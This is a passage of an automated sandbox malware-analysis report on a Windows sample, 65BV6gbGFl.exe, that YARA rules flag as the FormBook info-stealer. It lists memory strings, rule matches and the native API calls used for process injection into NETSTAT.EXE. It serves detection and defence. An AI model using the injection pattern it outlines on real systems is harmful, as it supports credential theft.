          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.688345208.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: 65BV6gbGFl.exe, 00000000.00000002.666363002.00000000013EA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1008210672.0000000000DA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.705655666.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1008715043.0000000003240000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.705409685.0000000000C60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.668132085.0000000003FD1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.704845326.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.65BV6gbGFl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.65BV6gbGFl.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1008210672.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1008210672.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.705655666.0000000001170000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.705655666.0000000001170000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.1008715043.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.1008715043.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.705409685.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.705409685.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.668132085.0000000003FD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.668132085.0000000003FD1000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.704845326.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.704845326.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.65BV6gbGFl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.65BV6gbGFl.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.65BV6gbGFl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.65BV6gbGFl.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00419D50 NtCreateFile,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00419E00 NtReadFile,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00419E80 NtClose,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00419D4B NtCreateFile,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00419DFE NtReadFile,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00419DA4 NtCreateFile,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00419E7A NtClose,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00419F2B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012199A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012198F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012195D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012197A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012196E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012199D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0121B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012198A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0121A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219A10 NtQuerySection,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0121AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219560 NtWriteFile,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012195F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0121A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219760 NtOpenProcess,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0121A770 NtOpenThread,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01219650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012196D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038996D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038996E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038995D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0389A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038999D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038998A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038998F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0389B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038997A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0389A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0389A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038995F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0389AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03899560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DB9D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DB9E80 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DB9E00 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DB9F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DB9DFE NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DB9DA4 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DB9D4B NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DB9E7A NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DB9F2B NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_02E9C148
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_02E9A758
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_02E9F828
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_02E9F838
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_06213628
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_06213638
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_06213881
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_06213890
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_06307260
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_06308978
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_06306990
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 0_2_06306648
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0041D906
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0041DB32
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0041DBA5
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0041E5ED
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0041DE55
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00409E2C
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00409E30
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0041DF6E
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0041D781
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0041CF93
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011DF900
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F4120
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F99BF
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012AE824
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01291002
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA830
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012020A0
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A20A8
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011EB090
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A28EC
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A2B28
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FA309
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011FAB40
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120EBB0
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012903DA
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0120ABD8
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129DBD2
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0128FA2B
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A22AE
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A2D07
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011D0D20
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A1D55
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_01202581
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A25DD
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011ED5E0
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011E841F
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129D466
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A1FF1
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012ADFCE
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_011F6E30
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_0129D616
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: 1_2_012A2EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0388EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0391DBD2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039103DA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0388ABD8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039023E3
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A309
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03922B28
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387AB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039222AE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914AEF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0390FA2B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038799BF
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0385F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03874120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0386B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_038820A0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039220A8
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039228EC
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03911002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0392E824
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0387A830
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0392DFCE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03921FF1
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03922EF7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0391D616
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03876E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03882581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03912D82
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_039225DD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0386D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03922D07
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03850D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03921D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_03914496
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0386841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_0391D466
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DBE5ED
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DA2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DBDE55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DA9E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DA9E2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DBCF93
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DBD781
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DA2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 6_2_00DBDF6E
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0385B150 appears 133 times
          Source: C:\Users\user\Desktop\65BV6gbGFl.exeCode function: String function: 011DB150 appears 87 times
          Source: 65BV6gbGFl.exe, 00000000.00000002.666713130.0000000002FD1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSoapName.dll2 vs 65BV6gbGFl.exe
          Source: 65BV6gbGFl.exe, 00000000.00000002.668132085.0000000003FD1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePositiveSign.dll< vs 65BV6gbGFl.exe
          Source: 65BV6gbGFl.exe, 00000000.00000002.666363002.00000000013EA000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 65BV6gbGFl.exe
          Source: 65BV6gbGFl.exe, 00000000.00000002.666144409.0000000000D24000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUnicodeCategory.exe8 vs 65BV6gbGFl.exe
          Source: 65BV6gbGFl.exe, 00000001.00000002.705832250.00000000012CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs 65BV6gbGFl.exe
          Source: 65BV6gbGFl.exe, 00000001.00000002.705302329.00000000007B4000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUnicodeCategory.exe8 vs 65BV6gbGFl.exe
          Source: 65BV6gbGFl.exeBinary or memory string: OriginalFilenameUnicodeCategory.exe8 vs 65BV6gbGFl.exe
          Source: 65BV6gbGFl.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1008317476.0000000000EE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1008210672.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1008210672.0000000000DA0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.705655666.0000000001170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.705655666.0000000001170000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.1008715043.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.1008715043.0000000003240000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.705409685.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.705409685.0000000000C60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
